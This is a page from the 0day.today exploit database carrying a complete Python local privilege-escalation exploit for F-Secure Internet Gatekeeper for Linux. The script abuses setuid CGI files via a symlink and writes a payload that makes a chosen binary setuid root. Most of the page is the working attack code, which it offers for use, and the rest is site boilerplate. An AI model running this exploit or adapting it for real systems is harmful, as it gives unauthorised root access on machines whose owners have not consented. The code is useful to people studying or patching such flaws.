0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
F-Secure Internet Gatekeeper for linux < 2.15.484 Local Root Exploit
[====================================================================
F-Secure Internet Gatekeeper for linux < 2.15.484 Local Root Exploit
====================================================================
#!/usr/bin/env python
#
# F-Secure Anti-Virus Internet Gatekeeper for Linux <2.15.484
# F-Secure Anti-Virus Linux Gateway <2.16 # added line 3-4 for references /str0ke
#
##############################################################################
## fsigk_exp.py: F-Secure Internet Gatekeeper for Linux local root exploit
## acknowledgements: everyone in pure-elite and uDc.
##
## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
##############################################################################
##############################################################################
## Make proper checks and import nessesary calls from modules.
##
try:
from sys import argv
except Exception:
print "the 'sys' module could not be loaded"
raise SystemExit
try:
from os import unlink, stat, error, symlink, system, chmod
except Exception:
print "the 'os' module could not be loaded"
raise SystemExit
try:
import getopt
except Exception:
print "the 'getopt' module could not be loaded"
raise SystemExit
##############################################################################
## Constants.
##
__program__ = argv[0]
__version__ = "0.1beta"
__author__ = "<xavier@tigerteam.se>"
__lastedit__ = "Thu Sep 22 23:18:39 EDT 2005"
__usage__ = """usage: %s [-options]
options:
--version show program's version number and exit.
-h, --help show this help message and exit.
-s, --suid file location to suid.
-d, --dir cgi directory.
-c, --clean cleans any left over files from the environment creation.
-# enter numerical value of vulnerable file to exploit. [list below]
1: ifconfig_suid.cgi | 2: reboot_suid.cgi | 3: proxy_suid.cgi
4: edittmpl_suid.cgi | 5: version_suid.cgi | 6: hostname_suid.cgi
7: gateway_suid.cgi | 8: halt_suid.cgi | 9: edituserdb_suid.cgi
10: htpasswd_suid.cgi | 11: pattern_up_suid.cgi | 12: license_suid.cgi
13: iptables_suid.cgi | 14: dns_suid.cgi | 15: pattern_autoup_suid.cgi
16: spam_list_suid.cgi | 17: diag_suid.cgi""" % (__program__)
#######################################################################################
## Functions.
##
def _write(file, payload):
try:
open(file, 'w').write(payload)
chmod(file, 0100)
except Exception, err:
print ("[-] %s" % (err))
def _exists(path):
try:
stat(path)
except error:
return False
return True
def _handleopts():
for opt in argv[1:]:
if opt in ("-h", "--help"):
print "%s" % (__usage__),
raise SystemExit
if opt in ("-v", "--version"):
print "%s (%s)" % (__version__, __lastedit__),
raise SystemExit
_method_ = 'ifconfig_suid.cgi'
_file_ = 'ifconfig.cgi'
for opt in argv[1:]:
if opt == "-1":
_method_ = 'ifconfig_suid.cgi'
elif opt == "-2":
_method_ = 'reboot_suid.cgi'
_file_ = 'reboot.cgi'
elif opt == "-3":
_method_ = 'proxy_suid.cgi'
_file_ = 'proxy.cgi'
elif opt == "-4":
_method_ = 'edittmpl_suid.cgi'
_file_ = 'edittmpl.cgi'
elif opt == "-5":
_method_ = 'version_suid.cgi'
_file_ = 'version.cgi'
elif opt == "-6":
_method_ = 'hostname_suid.cgi'
_file_ = 'hostname.cgi'
elif opt == "-7":
_method_ = 'gateway_suid.cgi'
_file_ = 'gateway.cgi'
elif opt == "-8":
_method_ = 'halt_suid.cgi'
_file_ = 'halt.cgi'
elif opt == "-9":
_method_ = 'edituserdb_suid.cgi'
_file_ = 'edituserdb.cgi'
elif opt == "-10":
_method_ = 'htpasswd_suid.cgi'
_file_ = 'htpasswd.cgi'
elif opt == "-11":
_method_ = 'pattern_up_suid.cgi'
_file_ = 'pattern_up.cgi'
elif opt == "-12":
_method_ = 'license_suid.cgi'
_file_ = 'license.cgi'
elif opt == "-13":
_method_ = 'iptables_suid.cgi'
_file_ = 'iptables.cgi'
elif opt == "-14":
_method_ = 'dns_suid.cgi'
_file_ = 'dns.cgi'
elif opt == "-15":
_method_ = 'pattern_autoup_suid.cgi'
_file_ = 'pattern_autoup.cgi'
elif opt == "-16":
_method_ = 'spam_list_suid.cgi'
_file_ = 'spam_list.cgi'
elif opt == "-17":
_method_ = 'diag_suid.cgi'
_file_ = 'diag.cgi'
else:
pass
try:
opts = getopt.getopt(argv[1:], 'c1234567890s:d:', ['clean', \
'suid=', \
'dir='])[0]
except Exception, (err):
print "[-] %s" % (err),
raise SystemExit
_dir_ = None
_payload_ = None
_combine_ = None
for o, a in opts:
if o in ("-c", "--clean"):
_clean()
print "[*] done"
raise SystemExit
if o in ("-d", "--dir"):
if _exists(a):
_dir_ = a
else:
print "[-] unable to access the %s directory" % (_dir_),
raise SystemExit
if o in ("-s", "--suid"):
if _exists(a):
_payload_ = _suid(a)
else:
print "[-] unable to access binary."
raise SystemExit
if _dir_ == None:
print "[-] no directory was given [try -h for help menu]"
raise SystemExit
if _payload_ == None:
print "[-] enter binary to suid [try -h for help menu]"
raise SystemExit
_combined_ = "%s/%s" % (_dir_, _method_)
if not _exists(_combined_):
print "[-] method not possible, try another."
raise SystemExit
print "[*] creating environment..."
try:
symlink('%s/%s' % (_dir_, _method_), 'runbad')
_write(_file_, _payload_)
except Exception, err:
raise SystemExit
def _suid(file):
_suid_ = """#!/bin/sh
chown 0.0 %(file)s
chmod 4755 %(file)s
""" % (locals())
return _suid_
def _clean():
try:
files = ['runbad', 'ifconfig.cgi', 'reboot.cgi', 'proxy.cgi',
'edittmpl.cgi', 'version.cgi', 'hostname.cgi', 'gateway.cgi',
'halt.cgi', 'edituserdb.cgi', 'htpasswd.cgi', 'pattern_up.cgi',
'license.cgi', 'iptables.cgi', 'dns.cgi', 'pattern_autoup.cgi',
'spam_list.cgi', 'diag_suid.cgi']
for file in files:
if _exists(file): unlink(file)
except Exception, err:
print "[-] %s" % (err),
##############################################################################
## main() // main code.
##
def main():
try:
print "[INFO] F-Secure Internet Gatekeeper for Linux <=2.10-431 local exploit by %s" % (__author__)
print "[*] handling options, arguments..."
_handleopts()
print "[*] executing exploit..."
system('./runbad')
print "[*] cleaning..."
_clean()
print "[*] done... try executing the specified binary."
except KeyboardInterrupt:
print "[-] caught keyboard interuption"
raise SystemExit
except Exception, (err):
_clean()
raise SystemExit
if __name__ == '__main__': main()
# 0day.today [2024-11-15] #